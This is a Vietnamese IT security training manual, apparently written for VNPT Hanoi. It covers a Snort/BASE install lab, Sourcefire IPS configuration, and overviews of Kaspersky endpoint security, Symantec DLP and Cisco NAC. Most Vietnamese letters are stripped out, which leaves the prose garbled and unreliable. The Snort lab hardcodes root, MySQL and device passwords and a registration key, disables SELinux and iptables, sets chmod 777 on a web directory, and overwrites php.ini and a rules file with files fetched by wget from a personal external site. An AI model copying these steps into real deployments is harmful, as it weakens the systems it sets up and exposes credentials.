Khi gi tin i vo thit b Sourcefire s c x l qua cc bc:
7, 2012
Khi gi tin c capture bi thit b Sourcefire gi tin s c:

- Decode bi thnh phn Decoders ca Sourcefire
-
Sau gi tin s c chuyn vo qu trnh Preprocessors
Gi tin s c so snh vi tp Rules c s dng
Qu trnh s a ra c mt c s d liu v cc Event
Cc Event c th c lc ra thnh cc dng Event khc nhau. T cc Event c

pht sinh s c thc hin lm mt s tc v khc.
Hiu v qu trnh phn tch traffic network
7, 2012
Event s c ni dung:
Note: Impact Flag l tnh nng kt hp gia IPS v RNA cho php nh gi mc ri
ro ca cuc tn cng. Mc nguy him nht l Flag 1, tip theo l 2,3,4 mc t ri ro
nht l mc Flag 1.
Qu trnh x l gi tin v Decoding
7, 2012
Qu trnh ny s Decode gi tin t Layer 2
Sau khi Decode thit b Sourcefire s thc hin tip qu trnh Preprocessors v so snh
vi tp Rules
Cc Event s c to ra t cc qu trnh
7, 2012
a. Ci t v cu hnh Snort lm IDS/IPS
Prepare install
L bc chun b h iu hnh, cc th vin, v b ci
Install
L bc tin hnh ci t, cu hnh cc dch v lin quan v snort.
NOTE_1: Bt my a Fedora Core 10, vo snapshot v Orgin. ng nhp vo Fedora
vi user: root v password: yeuemnhieu
NOTE_2: c k tng dng, dng no c du "#" u l ch minh ha cn dng khng
c du # l cu lnh.
NOTE_3: Dng no l ch in nghing l command line cn phi chy
NOTE_4: Sau khi logon hoc khi ng li phi t a ch IP vi cu lnh:
ifconfig eth0 192.168.0.x/24
route add default gw 192.168.0.1
echo "nameserver 208.67.222.222" > /etc/resolv.conf
7, 2012
Nu khng c eth0 th s dng eth1

Prepare Install
Update OS bng cu lnh:
yum install update
Ci t cc th vin cho Snort
yum install iptables-devel libpcap libpcap-devel pcre pcre-devel pcre-lib php phpcommon php-gd
php-cli php-mysql flex bison mysql mysql-devel mysql-bench
mysql-server gcc gcc-c++
To th mc cha Snort trong h thng
mkdir /etc/snort
mkdir /etc/snort/log
Copy cc b ci ln th mc /root/Desktop
Cc b ci l: Snort-2.8.5.tar.gz, Snortrule...tar.gz; base-1.4.4.tar.gz, adodb vao thu muc
/root/Desktop. Nu logon c trn Desktop ri th ok
7, 2012
Ci t Snort
SELinux Disable
SELinux l dch v tng t nh UAC trn windows, thc hin t ng nhiu cu lnh mt
lc yu cu cn phi Disable tnh nng ny ca Fedora.
---> Vo System --> adminstration --> SELinux Management ri disable lm theo cc bc di
y:
- disable SElinux
- restart lai may tinh
- kiem tra SElinux OK
- dat dia chi IP
Service
ci t Snort cn phi tt v bt mt s Service, v d nh IPTABLES nu Enable th s
khng capture c d liu th sao lm IDS c. Cc Service cn phi lm l:
- Stop iptables
- start mysqld
- start httpd
Cu lnh cu hnh cc dch v ny l:
/etc/init.d/iptables stop
/etc/init.d/mysqld restart
/etc/init.d/httpd restart
Install Snort
7, 2012
Gii nn v ci t snort
Ci t Snort vi cu lnh di y:
cd /root/Desktop
tar xzvf snort-2.8.5.tar.gz
cd snort-2.8.5
./configure --with-mysql && make && make install
cd /etc/snort
tar xzvf /root/Desktop/snortrules-snapshot-CURRENT.tar.gz
Cu hnh Snort
Vo th mc /etc/snort/etc copy tt c cc file ra ngoi th mc /etc/snort
Cu hnh file /etc/snort/snort.conf:
- Nhn p vo file s ra giao din Texteditor edit file vo:
+ Dng th 194 cu hnh: path rule l /etc/snort/rules
+ Dng th 259,260: Thm du # vo u dng (Snort free ch h tr 1 Detection Option)
+ Dng th 829: B du # u dng. Thit lp: user snort; passoword snort; database l
snort; host l localhost (Dng ny cu hnh user ng nhp vo MYSQL cho snort).
Ci t v cu hnh Database Mysql (user root cua toi password=123456)
Cu lnh cu hnh MYSQL:
mysql
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost;
SET PASSWORD FOR snort@localhost=PASSWORD('snort');
7, 2012
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to root@localhost;

SET PASSWORD FOR root@localhost=PASSWORD('123456');
create database snort;
quit
cd /root/Desktop/snort-2.8.5/schemas
mysql -p < create_mysql snort
Khi xut hin yu cu nhp password g: 123456 ri enter
Ci t BASE v ADODB
ADODB l dch v mc d liu t MYSQL ra, BASE l Web APP hin th d liu ca ADODB.
Cu lnh ci t:
cd /var/www/html
tar xzvf /root/Desktop/base-1.4.4.tar.gz
cd /var/www/html/base-1.4.4
tar xzvf /root/Desktop/adodb4991.gz
chmod 777 /var/www/html/base-1.4.4/
chown /var/www/html/base-1.4.4/
chown apache /var/www/html/base-1.4.4/
chgrp apache /var/www/html/base-1.4.4/
7, 2012
Truy cap cau hinh BASE qua web

- Chnh sa file /etc/php.ini
+ File php.ini l file cu hnh ca PHP, mc nh file ny b li nn phi xa i v
download li bng cc cu lnh di y:
rm /etc/php.ini -f
cd /etc
wget http://tocbatdat.googlepages.com/php.ini
+ Sau khi download vo th mc /etc file php.ini s b thay i tn nn chng ta cn phi
thay i li v php.ini
+ Khi ng li dch v web vi cu lnh:
- Cu hnh Base
+ Vo firefox: http://localhost/base-1.4.4
Bc 1: Nhn continue tip tc
Bc 2: cu hnh Path ca ADODB: /var/www/html/base-1.4.4/adodb
Bc 3: cu hnh user ng nhp vo SQL:
Database:
snort
Host:
Localhost
User:
snort
Pass:
Snort
Bc 4: Cu hnh User qun tr l: User: snort; password: snort

7, 2012
Bc 5: Create BASE
Bc 6: OK
- cau hinh tu buoc 1 -> 5
Run SNORT
test snort chy hay khng chng ta download mt file exploit.rule t website ca mnh v
bng cu lnh di y:
Lu download xong phi vo th mc i tn file:
rm /etc/snort/rules/exploit.rules -f
cd /etc/snort/rules
wget http://tocbatdat.googlepages.com/exploit.rules
Sau khi download file exploit.rules b thay i tn nn chng ta cn phi thay i li v php.ini
Sau khi i tn tin hnh chy Snort bng cu lnh:
snort -v -c /etc/snort/snort.conf -l /etc/snort/log
5. View v Test kt qu
Dng Firefox truy cp a ch:
http://localhost/base-1.4.4
Th ping ra ngoi vi gi tin ln hn 800 bng cu lnh
ping 192.168.0.1 -s 888
Troubleshooting
Nu khng chy c Snort: 1. Xem li cc NOTE. 2 th kim tra li t Phn 1-5 ca
phn II ci t SNORT:
7, 2012
11. Ci t v cu hnh Sourcefire IPS

a. Tnh nng ca h thng IPS Sourcefire
Thit k h thng IPS gip pht hin v ngn nga cc cuc tn cng, cc nguy c tim n v an
ton bo mt thng tin t bn ngoi vo vng DMZ hoc Server Frame ca VNPT H Ni
Tnh nng RNA b xung cho IPS/IDS cung cp tnh nng Network profile (OS, Services, Open
Ports, Vulnerability, Host static). T kt hp vi IPS/IDS t ng cu hnh, tinh chnh
Rules
Yu cu tnh nng c th v h thng IPS ti VNPT H Ni
STT
Tnh nng
Tnh nng IPS

bo v cc
vng mng
M t
Pht hin cc cuc tn cng t bn ngoi nh Worms,
Trojans, Buffer overflows, DoS attacks, Backdoor attacks,
Spyware, Port scans, VoIP attacks, IPv6 attacks, Statistical
anomalies, Protocol anomalies, P2P attacks, Blended
threats, Zero-day attacks vo cc server dch v
C th xc lp cc qui tc ngn chn cc cuc tn cng hoc
xc lp ch t ng tinh chnh ty theo cc dch v
a ra cc bo co v cc cuc tn cng, cc l hng bo
mt
Tnh nng IDS

pht hin cc
cuc tn cng
cho cc VLAN
thit lp gim
st.
Pht hin v a ra cc bo co v cc cuc tn cng, cc

nguy c bo mt, l hng an ninh ca cc server, dch v
ca cc VLAN gim st.
Pht hin cc cuc tn cng, cc nguy c bo mt t
ngi dng
Trong trng hp xy ra tn cng t ngoi vo cc host
trong vng gim st th c th thit lp tnh nng IPS trn
thit b bo v cc host ngn chn tn cng t bn ngoi
vo cc vng
STT
Tnh nng
Tnh nng
gim st cnh
bo tc thi
(Real time
Network
Awarreness RNA)
IT Policy
complicance
7, 2012
M t
RNA gip pht hin cc nguy c an ninh mng:Network
profile (OS, Services, Open Ports, Vulnerability, Host
static). RNA kt hp vi IPS, IDS t ng active/disable
cc rules cn thit bo v h thng mng.
Tnh nng Passive Scan cho php RNA pht hin nguy c
an ninh h thng mng m khng nh hng ti nng lc h
thng mng
a ra nhng cnh bo nhng vi phm v chnh sch bo
mt.Nhng vi phm ny c th l: mt cuc tn cng nguy
him xy ra, mt s c lin quan ti mt my ch hay mt
dch v.
Cnh bo c th thc hin qua Email, SNMP hay SYSLOG.
7, 2012
b. M hnh trin khai in hnh h thng IDS/IPS
Phn tch m hnh in hnh ca Sourcefire

Sourcefire c hai dng sn phm, Sourcefire Defense Center l thit b qun l tp trung,
Sourcefire 3D Sensor l dng thit b Sensor cung cp cc tnh nng IPS/IDS.
Sourcefire Khi trin khai vo h thng c th hot ng Inline (IPS) hoc Passive (IDS), c
th pht hin v ngn chn cc cuc tn cng hay cc nguy c an ninh mng.
Cc Event ca cc Sensor s c chuyn v thit b qun l tp trung.
7, 2012
c. Nguyn l hot ng ca h thng IDS/IPS Sourcefire

Nguyn l chung
S thnh phn & nguyn l hot ng
Gii thch nguyn l hot ng v cc thnh phn ca thit b SourceFire sensor qua v d sau:
Thit b SourceFire 3D Sensor 3D3500c 8 cng Ethernet lm nhim v Sensing:
Interface Sets:
+ Cc cng ny c nhm vo cc Interface Sets khc nhau. Trn hnh vi 3 Interface Sets
c to
7, 2012
+ Interface Sets c to ra c hai mode Passive v Inline (Inline v Inline with Fail Open)
Detection Engine: lm nhim v thc thi Monitoring trn Interface Sets (nh nhng ngi gc
cng). trn hnh c hai Detection Engine c to v thc thi nhim v Monitoring trn cc
Interface Sets. C 3 loi Detection Engine l: IPS, RNA, RUA
Policy: L chnh sch p dng cho cc loi Detection Engine. Intrusion Policy p dng cho IPS
Detection Engine, Detection Policy p dng cho RNA.
S gii thch nguyn l hot ng ca IDS/IPS Sourcefire.
7, 2012
[TL: o to v An ton thng tin cho ABC
6, 2012
Step 1: Cc port sensing trn thit b Sourcefire 3D Sensor c nhm li thnh: Interface
Sets. M hnh trn l to ra Interface Sets dng Inline mode.
Step 2: Trn cc interface sets ny to ra cc Detection Engine vi chc nng gim st.
Step 3: cc Detection Engine hot ng cn phi xy dng chnh sch thit lp p
dng cho cc Detection Engine ny.
Step 4: Khi Detection Engine c cc hnh ng block traffic hay pht hin ra cc nguy c
an ninh s a ra cc Event.
d. Thit lp cc thng s qun tr cho cc thit b Sourcefire
Cm cable qun tr cho cc thit b
Trn cc thit b Sourcefire Sensor 3D cng qun tr l cng Eth1 nm pha sau thit b.
Trn thit b Sourcefire DC cng qun tr l cng Eth1 nm pha sau thit b
Cable qun tr c nh du r rng v cn phi chun b trc khi tin hnh lp t thit
b
Chun b cc Cable cm vo cc port sensing nh trong m hnh trin khai phn trn.
Thit lp cc thng s c bn cho thit b Sourcefire
+ t tn cho thit b theo ng quy hoch ca VNPT HN.
+ a ch IP
+ Password qun tr
-
a ch IP mc nh ca thit b l: 192.168.45.45, truy cp thit b qua giao din web:

bng cch https://192.168.45.45 User:admin v Password: Sourcefire
Giao din ln u tin ng nhp cho php chng ta thit lp li cc thng s c bn cho
thit b Sourcefire
6, 2012
e. Upgrade cho cc thit b Sourcefire

-
Sourcefire cho php Update t ng hoc do ngi qun tr upload gi update

download t trang support ca Sourcefire (Ngi qun tr c th yu cu nh phn phi
cung cp cc bn cp nht ny, Account ng nhp vo trang support ch cung cp khi
khch hng tham gia v c chng ch v kha hc do hng Sourcefire cung cp).
f. Cu hnh cc thit lp h thng (System settings)

-
y l phn thit lp chung nht v h thng cho thit b Sourcefire nh cu hnh: a

ch IP, Time, License, shutdown/restart
vn hnh v qun tr h thng Sourcefire IPS cn phi bit kim tra cc thng tin h
thng cho ng vi thit k, thay i cc thit lp h thng cho ph hp vi yu cu t
ra.
Ngi qun tr v vn hnh h thng Sourcefire IPS cn phi gim st v c th thay

i mt s thng tin h thng di y:
Information
L thng tin chung nht v thit b Sourcefire.
6, 2012
Tn thit b, Model, Version, a ch IP. Quan trng l cho bit cc Policy c p dng
cho thit b.
-
Cho php ngi qun tr thay i tn ca thit b
License
L mc xem v qun l License cho thit b Sourcefire
6, 2012
Network
-
Cho php ngi qun tr xem v thit lp IP, DNS, Proxy, Hostname cho thit b
Sourcefire.
Mi thit b Sourcefire trin khai ti VNPT H Ni s c t a ch IP, Tn thit b
Network Interface
Cho php ngi qun tr thit lp cng qun tr
6, 2012
Process
Ngi qun tr c th truy cp vo mc process a ra cc lnh nh: Shutdown, Reboot
hoc Restart thit b Sourcefire
Remote Management
Ngi qun tr c th thc hin vic qun l tp trung cc thit b ca Sourcefire theo ng
nh ti liu thit k: Thit b DC1500 qun l 2 thit b Sensor 3D3500
-
Cc thit b lm vic vi nhau thng qua

+ IP
+ Port (Ngi qun tr cu hnh)
+ Key (ngi qun tr thit lp dng Preshare key)
Cc bc cu hnh chi tit ngi qun tr c th xem ti ti liu trin khai
Time
Cho php thit lp thi gian cho thit b
Ngoi ra cn c mt s thit lp khc nh
netflow device, Storage, Heath blacklist
6, 2012
g. Thit lp qun tr tp trung cho cc thit b Sourcefire

Gii php Sourcefire s dng thit b Sourcefire DC qun l cc thit b Sourcefire 3D
Sensor. Ton b mi thit lp trn Sourcefire 3D Sensor u c th thc hin trn thit b
Sourcefire DC.
Ti VNPT H Ni sau khi thc hin thit lp qun l tp trung cho cc thit b Sourcefire,
mi cu hnh s c thc hin trn thit b Sourcefire DC1500.
M hnh qun tr tp trung ca Sourcefire
Management
VLAN
Mgt_port
Sourcefire
3D3500
Sensor
Mgt_port
Sourcefire
DC1500
Switch
Mgt_port
Sourcefire
3D3500
Sensor
Thit b Sourcefire DC1500 lm vai tr qun l cc thit b Sourcefire trong h thng

Thit b Sourcefire 3D Sensor lm nhim v Sensing v chu s qun l bi thit b
Sourcefire DC1500
Cc bc tin hnh cu hnh
Vic cu hnh qun tr tp trung trn cc thit b Sourcefire cn phi thc hin trn c hai
thit b Sourcefire DC v Sourcefire 3D Sensor.
Trn Sourcefire 3D Sensor phi thit lp chu s qun l ca thit b DC no da vo (IP,
Port, Registration Key).
Trn thit b Sourcefire DC phi thit lp thm Sensor da vo (IP, Port, Registration Key).
Thc hin trn thit b 3D Sensor
+ Truy cp vo cc thit b Sourcefire 3D Sensor Operations System Settings
Remote Management Add Manager. (port qun tr mc nh l 8305)
+ Thit lp a ch IP ca thit b qun tr l DC1500: 10.10.42.120
6, 2012
+ Thit lp Registration Key (key bo mt gia cc thit b): vthn123

+ Nhn Save. Thc hin tng t trn c 3 thit b Sourcefire 3D Sensor
Thc hin trn thit b Sourcefire DC1000

Truy cp vo thit b DC1000 Operations Sensor
Nhp a ch IP ca thit b 3D Sensor vo mc Host, registration key l: vthn123 ri
nhn add
6, 2012
Sau khi hon tt qu trnh thit lp qun l cc thit b c th vo thit b DC1500

Operations Sensor xem cc thit b c qun l. ( y v d l mt thit b DC
qun l 3 thit b 3D Sensor)
h. Cu hnh Interface Sets v Detection Engine.

Cu hnh Interface Sets
Interface Sets l nhm cc Port Sensing trn thit b Sourcefire 3D Sensor. Ngi qun
tr c th nhm cc Interface li thnh mt Interface Sets.
Interface Sets c cc dng nh:
+ Passive thc hin hot ng IDS
+ Inline Thc hin hot ng nh IPS
+ Inline With Fail-Open Thc hin nh IPS nhng khi thit b li h thng mng
khng b gin on.
Trn DC1500 thc hin: Operations Detection Engine Interface Sets. La chn
tn, loi v to ra trn thit b Sourcefire 3D Sensor no.
6, 2012
Cu hnh Detection Engine

C 3 Loi Detection Engine: IPS, RNA, RUA. Do VNPT H Ni ch mua license IPS v
RNA nn ch c th to ra 2 loi detection engine ny.
+ IPS Detection Engine cho php pht hin v ngn chn cc cuc tn cng mng
+ RNA cho to ra Network Profile
+ RUA cho php pht hin v map hai yu t IP User vi nhau.
Mi Interface Sets c th to ra nhiu loi Detection Engine gim st.
Detection Engine l cc engine c chc nng gim st trn Interface Sets, ngi qun tr
c th gim st xem cc Detection Engine c p dng ng trn cc Interface Sets hay
cha.
Detection Engine c th c ngi qun tr thay i
Giao din thay i Detection Engine p dng cho cc Interface Sets
6, 2012
6, 2012
i. Qun tr v thit lp chnh sch cho IPS

y l phn rt quan trng trong vic qun tr v vn hnh thit b Sourcefire IPS. Ton
b vic thit lp chnh sch cho Detection Engine u c thc hin ti mc ny.
Ngi qun tr c th to ra cc chnh sch bo mt, khi c mt vi phm bo mt s a
ra nhng hnh ng ph hp vi vi phm ny.
Trong phn qun tr cc thit lp v chnh sch c cc mc chnh sau:

Qun tr IPS
Qun tr RNA
Qun tr chnh sch bo mt
6, 2012
Qun tr IPS
Qun tr IPS bao gm vic thit lp chnh sch cho cc Detection Engine, qun l cc
Rules, qun l update SEU v mt s tnh nng khc
Qun tr Intrusion Policy

Intrusion Policy l chnh sch c p dng cho mt hoc nhiu Detection Engine.
Intrusion policy thit lp cc thng s:
+ Tn ca Policy
+ Base Policy c p dng (c 3 mc : u tin kt ni hn bo mt, cn bng
kt ni v bo mt, u tin bo mt hn kt ni). Ti VNPT H Nikhuyn co s
dng mc bo mt cn bng.
+ Policy ny c p dng cho thit b Sensor no hay Detection Engine no chu
nh hng trc tip t chnh sch nay.
+ Ti Policy ny vi bao nhiu Rule cu hnh Enable v c bao nhiu Rule ch
: Ch cnh bo (Generate Events) v ngn chn/cnh bo (Drop and generate
event).
Di y l thng tin chung ca mt Intrusion Policy p dng cho Detection
Engine vng DMZ ca VNPT H Ni
6, 2012
Ngi qun tr c th qun l mc bo mt da trn cc khuyn co t hng vi

ba mc :
+ (High) Security over connectivity; (Lower) Connectivity over security; v
(Normal) balanced security and connectivity
6, 2012
Ngi qun tr c th xem v thay i cc Detection Engine chu chnh sch ny.
Vi hnh di th hin Policy ny p dng cho mt Detection Engine l vng DMZ
ca VNPT H Ni
Ngi qun tr c th tinh chnh cc bin cho cc rules hot ng mt cch hiu qu
nht t cc thay i va nh ngha mi Variable:
V nh nu dch v HTTP s dng thm cng 443 chng ta s thm cng 443 vo
mc HTTP_PORTS
6, 2012
Ton b rule ca Sourcefire l khong trn 20.000 Rules uc update thng xuyn
qua vic Import SEU t ng t Sourcefire.
Mi Policy Intrusion p dng cho mi Detection Engine chng ta c th p dng
nhng Rules c Enable/Disable khc nhau.
Ngoi cc rule c enable v disable mc nh ngi qun tr cn phn tch tnh
hnh c th bt tt cc rule sao cho p ng yu cu v bo mt ca h thng.
Khi s dng tnh nng RNA pht hin h thng mng (Host active, OS, Service,
IP, MAC, Vulnerability). Th thit b Sourcefire c th s dng kt qu ny thay
i trng thi cc Rules nng cao hiu nng x l thit b, gim thiu cc Event
khng quan trng.
Chng ta c th s dng RNA recommend trng thi cc Rules
6, 2012
Ngoi ra policy ny c th c p dng cho mt di mng
Advanced Settings cho Intrusion policy l phn thit lp quan trng i hi ngi
qun tr phi hiu bit su v h thng Sourcefire trc khi cu hnh trnh nh
hng ti h thng. Mc nh trong phn Advanced Settings ny hng cu hnh
mc nh
6, 2012
Policy Layers cho php mt h thng c nhiu Layer:

+ Layer mc nh c khuyn co t hng
+ Layer c thay i bi ngi dng
Sau mt lot cc thit lp ngi qun tr cn phi Commit Changes ng v

lu cu hnh cho Intrusion policy.
6, 2012
Sau khi lu Intrusion Policy ngi qun tr cn phi Apply policy cho cc
Detection Engines, sau khi apply cn phi kim tra qu trnh c thc hin thnh
cng hay khng
6, 2012
SEU
y l giao din gim st SEU c p dng vo Intrusion Policy
Ngoi ra ngi qun tr c th Update SEU cho thit b Sourcefire bng cch
download SEU t trang web Sourcefire ri Import vo thit b
Rule Editor
Mc nh Sourcefire c khong trn 20.000 Rules nhng ngi qun tr hon ton
c th thm cc Rule mi vo m bo cc chnh sch bo mt cho h thng ca
mnh. Trong giao din qun tr Rule Editor ngi qun tr c thm xem ni dung,
sa ni dng ca rule vi cc thit lp c th, cho php qun l Rule.
6, 2012
V d ti VNPT H Ni thm mt rule khng cho Ping gi tin ln hn 800 Byte,

bi nhng gi Ping ln c th gy nh hng ti h thng mng
6, 2012
Email alert
Khi nhng rule c match th th thit b Sourcefire s gi cnh bo ti ngi
qun tr.
Ngi qun tr c th s dng tnh nng Email Alert hoc s dng chnh sch
Compliance Policy
6, 2012
Qun tr RNA
RNA l mt tnh nng cao cp ca Sourcefire cho php pht hin h thng mng
bng phng thc Passive Scan thc hin 24/7.
Qun tr RNA chng ta cn thit lp cc mc di y:
Detection Policy
Detection Policy l chnh sch c p dng cho cc RNA Detection Engine.
Ngi qun tr cn phai to ra chnh sch ny p dng cho cc RNA Detection
Engin nhm pht hin h thng mng.
Giao din qun tr cc Detection Engine
Ngi qun tr c th tinh chnh cho RNA Detection Engine qua vic cu hnh
Detection Policy
Di y l giao din qun tr v cc thit lp c thc hin trong phn trin khai
thit b Sourcefire
6, 2012
Host Atributes
t cho mt vng mng
Ti VNPT H Ni t tn l VNPT Ha Noi v kt hp vi Network Map mt tnh
nng ca RNA
Network Map
Netowrk Map cho php ngi qun tr bit c h thng mng vi cc thng tin:
+ Host Active: c phn theo cc gii mng khc nhau
+ OS: Chi tit v h iu hnh
6, 2012
+ Cc dch v hot ng trn Host

+ Cc ng dng
+ Cc giao thc s dng
+ V l hng bo mt ca h thng
y l giao din qun tr Sourcefire vi tnh nng RNA Netowrk Map vi a ch
IP 172.29.1.18
6, 2012
RNA Detector
Ngi qun tr c th cu hnh RNA Detector enable hay Disable cc thit lp
ca RNA
Services hot ng trong h thng mng
Ngi qun tr c th vo RNA Services pht hin xem h thng ang chy
nhng Services g v nhng Services ang hot ng trn my no
Chi tit Serices
6, 2012
Chi tit service HTTP vi Vendor l YTS
Qun tr ng dng chy trn h thng mng

Ngi qun tr c th da vo tnh nng RNA Application kim tra cc ng
dng hot ng trong h thng mng
6, 2012
Thng tin qun tr cc ng dng trong h thng
j. Phn tch Event v IPS

Intrusion Event c thit k v thc hin chi tit ti ti liu thit k Report.
Intrusion Event lin quan ton b cc Event v IPS, ngi qun tr c th kim tra
theo di s lng Event theo:
+ Theo thi gian
+ Theo Detection Engine
+ C th lc theo nhiu la chn khc nhau
6, 2012
Ngi qun tr c th lc cc Event cn thit
6, 2012
6, 2012
6, 2012
12. Endpoint Security

a. Gii php Kaspersky Open Space Security (KOSS)
M hnh ca gii php Kaspersky Open Space Security
Kaspersky for mail Server
Kaspersky
Interne
Gatewa
Endpoint Security for File Server
Endpoint Security for Workstation

Gii php KOSS s dng cng c Kaspersky Security Central qun l tp trung ton b
cc gi bo mt trong gii php.
KSC cho php qun l phn cp p ng vi mi m hnh mng:
6, 2012
Kaspersky Security
Center MASTER
Kaspersky
Security
Center SLAVE
Kaspersky Endpoint Security
b. Tnh nng ca gi Kaspersky Endpoint Security

Gi Kaspersky Endpoint Security cho my trm my ch c cc tnh nng
6, 2012
Control component:
Application Startup Control

Application Privilege Control
Vulnerabiltiy Monitor
Device Control
Web Control
Protection Component:
General Protection Settings

File Anti-Virus
Mail Anti-Virus
Web Anti-Virus
IM Anti-Virus
System Watcher
Firewall
Network Attack Blocker
c. Lab ci t KSC v Endpoint Security cho my trm

13. Data Loss Prevent
L gii php chng r r thng tin ni b bao gm mt lot cc gii php:
-
Qun l ng dng
Qun l thit b phn cng (USB, CD-ROM.)
Qun l d liu
M ha d liu
Gim st v ghi nht k truy cp d liu
Di y ti trnh by mt gii php DLP ca Symantec:

DLP ngy cng tr nn quan trng bi cc t chc ngy nay ang rt quan tm v tp trung xy
dng cc bin php bo mt xung quanh thng tin quan trng ca h. gip cc khch hng bo
v d liu nhy cm hiu qu hn, nn tng DLP m ca Symantec s gip h tn dng kh nng
6, 2012
nhn bit theo ni dung ca vic trin khai h thng bo mt cho doanh nghip trn din rng,
ng thi tin hnh nhng bc quan trng bo mt cng nh ngn chn mt mt d liu.
Symantec Data Loss Prevention 10 s cho php doanh nghip ng dng c ch m ha v qun l
phn quyn doanh nghip (ERM - Enterprise rights management) da trn ni dung, ng thi tch
hp d dng vi cc gii php khc ca Symantec.
ng dng m ha v ERM theo ni dung
Tnh nng mi FlexResponse ca Symantec Data Loss Prevention 10 s gip nhm bo mt ca
doanh nghip p dng nhng c ch bo mt theo chnh sch i vi cc tp tin c cha d liu
quan trng, bao gm m ha hay ERM. Hin nay, vic kt hp gia DLP vi cc gii php CNTT
khc ang phi thc hin bng tay.
Nh hp tc vi cc nh cung cp th 3 hng u khc, nh GigaTrust, Liquid Machines, Oracle
v PGP Corporation, Symantec s mang n cho cc khch hng s a dng v cc la chn gii
php bo v tch hp.
V d, mt cng ty hin ch cho php mt s t ngi c truy cp thng tin v tha thun st
nhp cng ty s d dng p dng chnh sch DLP ca h phn loi d liu, ng thi s dng
Microsoft Active Directory Rights Management Services (ADRMS - Dch v qun l phn quyn
th mc ng ca Microsoft) p dng ERM i vi nhng bn sao lu ca d liu ny, mang
li mt c ch bo v mn rt hiu qu.
Tng cng kh dng ca Tnh thng minh DLP
Nhng h tr mi nht i vi XML v Dch v web s cho php gii php Symantec Data Loss
Prevention 10 gi nhng d liu DLP ti mi ng dng hoc h thng bo co, bao gm c cc
bng iu khin bo mt doanh nghip hay cc gii php v tun th, nh b gii php kim sot
tun th Symantec Control Compliance Suite.
V d, mt trang thng mi in t c th khi u bng cch dng DLP xc nh my ch c
nhng d liu chu s iu chnh ca cc iu lut PCI DSS. Nh gi thng tin ny ti cng c
Control Compliance Suite ca Symantec, th nhng my ch s c u tin kim tra thng
xuyn hn, theo c c s kim sot k lng i vi nhng khu vc lu tr d liu quan
trng.
Nhng tnh nng import/export mi (np/xut chnh sch) s cho php cc t chc m bo chnh
sch ca h c cp nht thng xuyn quy nh mi, ng thi lin kt v trao i cc chnh
sch vi nhiu ngi dng khc nhm chia s kinh nghim thc tin tt nht.
6, 2012
Tch hp thng sut vi nhng gii php khc ca Symantec

Vic tch hp mi vi Symantec Workflow s cho php ngi dng DLP 10 thc thi nhng tc v
theo chnh sch nh kha thit b u cui, m ha t ng vi gii php Symantec Endpoit
Encryption, Symantec Endpoint Protection v cc gii php bo mt khc ca Symantec cng nh
ca cc nh cung cp khc.
V d, nu mt nhn vin mun ti thng tin mt v USB, gii php Symantec Data Loss
Prevention c th truyn tin cho Symantec Endpoint Protection kha cng USB ch vi mt tc
v n gin.
Nhng ngi dng gii php bo mt email SaaS (Software-as-a-service - phn mm l dch v)
nh MessageLabs Hosted Email Encryption (mt dch v lu k ca Symantec) cng c th gim
st, bo v v truyn dn nhng thng tin mt mt cch bo mt, an ton vi email gi ra ngoi m
khng cn phi c mt h tng cng dch v email trc tip.
Dch v, ngn ng v s sn sng trn th trng
Cc dch v Symantec Data Loss Prevention gip khch hng c c thnh cng r rng nh
trin khai DLP, ng thi thu c nhng kin thc v kinh nghim cn thit tip tc ti u
ha gii php ny qua thi gian. Nh kt hp vi nhng dch v t vn v nhng cng ngh chng
mt mt d liu u ngnh khc, Symantec mang ti cho khch hng kh nng phn tch chuyn
su v nhng nguy c ri ro ca h i vi r r thng tin c bn trong v ngoi doanh nghip,
cng nh kh nng nh gi nh lng v khi lng d liu thc t chuyn qua h thng mng,
lu tr ng dng trn web v cc thit b u cui.
Symantec Data Loss Prevention 10 cng c chnh sch v h tr tm kim vi 25 ngn ng khc
nhau, ng thi c phin bn y ting Nht, Trung Quc ph thng v ting Php, theo
nhng ngi dng s dng nhng ngn ng ny c th t to lp chnh sch, qun l v x l s
c, ng thi thc thi qun l h thng mt cch ton din nht.
14. Network Access Control
m bo ngi dng truy cp vo h thng mng khng tm cch tn cng cn phi c qu
trnh kim tra, nh gi v a ra hng gii quyt.
VD: Mt ngui khch n cng ty bn, truy cp vo mng Wifi mc nh ngi khch s
khng th vo trong mng ni b c. truy cp vo mng ni b cn phi qua mt lot bc
6, 2012
kim tra. 1. Ci t Agent kim tra my tnh c m bo tnh an ton hanh khng. 2. NAC
gateway s a ra Policy quyt nh my tnh c c truy cp vo nhng vng no.
y ti trnh by mt bi vit v Cisco NAC, cc h thng khc hot ng tng t:
Cisco NAC l mt cch trin khai Network Admission Control mt cch n gin, c s dng
cho cu trc mng m bo cc chnh sch bo mt c p dng cho ton b cc thit b truy
cp vo cc ti nguyn mng. Vi NAC, cc nh qun tr c th xc thc, u quyn, v nh gi,
da trn cc kt ni s dng dy hay wireless, cc ngi dng truy cp t xa. N nhn din c
cc thit b nh laptops, IP phones, hay cc my chi game, vi cc chnh sch bo mt v ngn
chn cc nguy c tim n trong qu trnh truy cp d liu ca ngi dng
Tc dng ca Network Admission Control
D liu trong h thng mng b nhim virus hin nay l mt vn cn c quan tm mt cch
thch ng, cc loi virus ngy cng c nh hng ln i vi h thng. Ti nguyn c s dng
c bo m khng b nhim virus l mt yu cu v cn phi c thc hin, vi tnh nng
chng
virus
hiu
qu
Network
Admission
Control
l
mt
gii
php.
Cisco NAC gip m bo tnh trng ca cc my client trc khi truy cp vo mng. NAC lm
vic vi mt chng trnh Anti-Virus to ra cc iu kin, cc chnh sch thit lp c cung
cp cho cc my client trc khi chng truy cp vo cc ti nguyn mng.
NAC m bo cc my client trong mng lun lun c cp nht cc bn nng cp cho phn
mm dit virus mt cch tt nht. Nu client c mt yu cu cp nht bn nng cp, gii php
NAC s mang n kh nng cung cp cp nht trc tip cho qu trnh cp nht t cc my client.
Nu client c s xut hin t ngt virus c th gy ra nh hng i vi ton mng, NAC s
chuyn my client n mt vng mng c cch ly hon ton cho n khi qu my client c
kim tra mt cch k lng v m bo khng cn virus cng nh nhng kh nng nguy hai cho
h thng mng.
Cch lm vic ca Network Admission Control.
Vic trin khai ng dng NAC c tch hp t nhiu giao thc hin nay thng s dng v cc
sn phm ca Cisco vi mt vi sn phm v cc tnh nng nh:
Cisco Trust Agent (CTA) and plug-ins
Cisco IOS Network Access Device (NAD)
Extensible Authentication Protocol (EAP)
Cisco Secure Access Control Server (ACS)/Remote Authentication Dial-In User Service
(RADIUS)
Posture validation/remediation server
6, 2012
